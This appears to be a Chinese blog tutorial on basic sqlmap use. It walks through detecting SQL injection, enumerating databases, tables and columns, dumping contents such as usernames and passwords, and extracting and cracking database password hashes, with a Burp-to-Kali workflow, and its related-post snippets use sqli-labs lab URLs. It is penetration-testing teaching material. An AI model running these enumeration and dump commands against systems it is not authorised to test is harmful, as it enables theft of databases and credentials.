sqlmap基础使用

已于 2023-08-04 14:33:09 修改
阅读量251 收藏
点赞数
分类专栏: 渗透 文章标签: oracle 数据库
于 2023-07-20 12:44:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NSQ0207/article/details/131827587
版权

一、操作

1、判断是否存在注入

sqlmap.py -u url 

(如果注入点后面的参数大于等于两个,需要加双引号)



2、判断文本中的请求是否存在注入

Sqlmap.py -r desktop/1.txt 

一般在存在cookies注入的情况下使用



3、查询当前用户下的所有数据库

sqlmap.py -u url --dbs

确定网站存在注入后,用于查询当前用户下的所有数据库。如果当前用户有权限读取包含所有数据库列表信息的表,使用该命令就可以列出所有相关数据库。



4、获取数据库中的表名

sqlmap.py -u “url” -D dkeye(具体数据库) --tables

如果不加入-D来指定某一个数据库,那么会列出数据库中的所有的表。继续注入时缩写成—T,在某表中继续查询



5、获取表中的字段名

sqlmap.py -u “url” -D dkeye -T user_info(具体表名) --columns 

查询完表名后,查询该表中的字段名,在后续的注入中,—columns缩写成-C



6、获取字段内容

sqlmap.py -u “url” -D dkeye -T user_info(具体表名) -C usrname password(具体字段) --dump



7、获取数据库所有用户

sqlmap.py -u url --users

列出数据库所有用户,如果当前用户有权限读取包含所有用户的表的权限时,使用该命令就可以列出所有管理用户。



8、获取数据库用户的密码

sqlmap.py -u url --passwords

如果当前用户有读取包含用户密码的权限,sqlmap会先例举出用户,然后列出hash,并尝试破解。



9、获取当前网站数据库的名称

sqlmap.py -u url --curerent-db

使用该命令可以列出当前网站使用的数据库



10、获取当前网站数据库的用户名称

sqlmap.py -u url --current-user 

使用该命令可以列出当前网站使用的数据库用户

 二、具体过程:

1.用brup进行抓包

 2.将包复制到kali里面

3.判断文本中的请求是否存在注入

sqlmap -r '/home/kali/Desktop/123.txt' 

 4.完成后会有提示存在哪些SQL注入

5.查询当前用户下的所有数据库

sqlmap -r '/home/kali/Desktop/123.txt' --dbs

6.获取数据库中的表名

 sqlmap -r '/home/kali/Desktop/123.txt' -D mysql --tables

7.获取表中的字段名

 sqlmap -r '/home/kali/Desktop/123.txt' -D mysql -T user --columns 

8.获取字段内容

sqlmap -r '/home/kali/Desktop/123.txt' -D mysql -T user -C Host --dump

 

Serein_NSQ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 4万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入
sqlmap基础操作1
08-04
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看 3、基于报错注入,即页面会返回
sqlmap基础使用
weixin_43786406的博客
02-19 3140
一、以less-3/为入口,利用sqlmap实施自动化注入,获取sqli-labs网站的登录账户和密码 1、访问http://192.168.207.1/sql/Less-3,启动sqlmap 2、寻找注入http://192.168.207.1/sql/Less-3/?id=1 3、 获取数据库的所有库名-u "http://192.168.207.1/sql/Less-3/?id=1" 4、获取网站当前所在数据库的库名-u "http://192.168.207.1/sql/Les..
SQL注入sqlmap入门教程_sqlmap注入
yy1715713348的博客
04-22 317
原来sql注入如此简单以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。
sqlmap基础使用
qq_53030229的博客
09-05 185
一、sqlmap命令(这些是我整理出来的比较基础的命令) windows10下sqlmap安装 -h, --help 显示基本帮助信息 -hh 显示高级帮助信息(简单理解就是帮助信息更清晰) -u URL, --url=URL Target URL (e.g. “http://www.site.com/vuln.php?id=1”) –level=LEVEL Level of tests to perform (1-5, default 1) –
Sqlmap基本使用
xunhuanmao的博客
08-01 194
sqlmap基本使用方法
SQLMAP工具基础使用
紫洋的博客
03-27 487
本文用的是kali自带的sqlmap工具我们通过常用命令来理解sqlmap的基本使用
渗透测试工具sqlmap基础教程.docx
10-25
渗透测试工具sqlmap基础教程 sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由Python语言开发而成,因此运行需要安装python环境。本文旨在帮助渗透测试的小白入门,介绍sqlmap的...
27.Sqlmap基础用法、CTF实战及请求参数设置(一)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。一.Sqlmap
sqlmap学习思维导图
02-07
sqlmap学习思维导图,含基础知识及sql注入流程介绍及实例。
ibatis基础案例
02-18
关于ibatis的基础教程<properties resource="it/ibatis/SqlMap.properties"/> ${driver}" /> ${url}" /> ${username}" /> ${password}" /> </transactionManager>
SQLMAP基础使用 -u
Z_l123的博客
02-18 437
1.访问SQLi-Labs网站 访问Less-3,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-3/?id=1 2.启动SQLMAP 进入sqlmap目录,在搜索框输入cmd,并回车 3.寻找注入 使用以下命令自动寻找网站的注入,并获取网站及后台数据库的基本信息: python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-3/?id=1" 检测结果: 4.获.
sqlmap基本使用说明
sopora的博客
10-09 582
sqlmap基本参数 ___ __H__ ___ ___[(]_____ ___ ___ {1.2.3#stable} |_ -| . ["] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V |_| http://sqlmap.org Usage: python sqlmap [op...
sqlmap基础使用手册 ─=≡Σ(((つ•̀ω•́)つ 知己知彼百战百胜 >web安全<
寻觅的博客
03-03 1708
文章目录sqlmap简介sqlmap特性sqlmap下载安装与启动sqlmap基础使用 sqlmap简介 顾名思义,sqlmap是一个自动化sql注入的开源的渗透工具,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。他有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹、从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令。官方网址 如果...
sqlmap工具基本使用(检测sql注入
m0_37570494的博客
01-25 6113
sqlmap的用户手册: sqlmap是python2进行运行的,如果要直接使用,需要把sqlmap设置到环境变量中: sqlmap主要用于sql注入方面的异常检测 Mysql数据库 1、先检测是否可以注入,先判断是否可以正常注入sqlmap -u url -v 3 里面有个注意的url后面必须是可注入的参数?id=之类的,否则url检测会有问题 对于某些今天url可以在/a/b*.html尝试加入*号来进行此路径内的检测 2、爆库 sqlmap.py -u http://...
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
A_991128a的博客
09-07 1030
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入」2、查看所有「数据库」3、查看当前使用数据库4、查看「数据表」5、查看「字段」6、查看「数据」
SQL注入注入找法
m0_67390969的博客
07-28 1735
2,交互一般是搜索栏、留言版、登入/注册页面、以及最利于观察的搜索栏的地址如果类似于http//www.xxx.com/index.phpid=1这种很大程度存在注入当然有些注入不会这么一眼看出会有些比较复杂例如http//www.xxx.com50006/index.phpx=home&c=View&a=index&aid=9这样的地址其实也可能存在注入。1,注入首先观察搜索框的地址是否是有与数据库交互,例如html这种几乎是不存在注入的所以要先判断是否有交互。...
sqlmap注入总结
weixin_34321753的博客
08-22 1417
本实验是基于DVWA和sqli-labs的实验环境实验平台搭建:下载Wamp集成环境,并下载DVWA和sqli-labs和压缩包解压至wamp\www的目录下。安装只要注意Wamp环境的数据库名和密码对应即可。sqlmap里涉及到的sql注入原理,请参考http://wt7315.blog.51cto.com/10319657/1828167,实验环境也是基于sqli-lab...
sqlmap使用基础
最新发布
04-27
以下是SQLMAP工具的基础使用方法[^1]: 1. 获取数据库表: ```shell sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 1 -D security --tables ``` 这个命令将会获取指定URL中的数据库security中的所有表。 2. 获取表的字段: ```shell sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 1 -D security -T users --columns ``` 这个命令将会获取数据库security中表users的所有字段。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值